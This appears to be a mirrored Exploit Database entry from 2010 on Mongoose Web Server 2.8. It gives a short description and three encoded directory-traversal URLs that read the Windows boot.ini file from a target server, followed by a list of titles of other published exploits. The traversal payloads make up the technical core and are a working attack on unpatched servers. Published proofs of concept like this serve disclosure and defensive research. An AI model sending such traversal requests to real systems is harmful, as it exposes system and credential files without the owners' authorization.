Mongoose Web Server 2.8 – Multiple Directory Traversals

Exploit Database
90 阅读

作者： Dr_IDE

日期： 2010-04-20
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/12309/

################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By: Dr_IDE
# Date: Apr. 20, 2010
# Tested On:Windows 7
# Download: http://code.google.com/p/mongoose/downloads/list
#
################################################################

- Description -

Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.

Mongoose v2.8 is vulnerable to manyremote directory traversal attacks.

- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini

#[pocoftheday.blogspot.com]

last Exploits
Mongoose Web Server 2.8 – Multiple Directory Traversals的更多信息

SolarWinds LEM 6.3.1 – Remote Code Execution (Metasploit)：
EnjoySAP SAP GUI – ActiveX Control Buffer Overflow (Metasploit)：
Dahua Generation 2/3 – Backdoor Access：
ZyXEL PK5001Z Modem – Backdoor Account：
Microsoft Windows mshta.exe 2019 – XML External Entity Injection：
HP LoadRunner – lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)：
Novell Messenger Server 2.0 – Accept-Language Overflow (Metasploit)：
Raspberry Pi 5.10 – Default Credentials：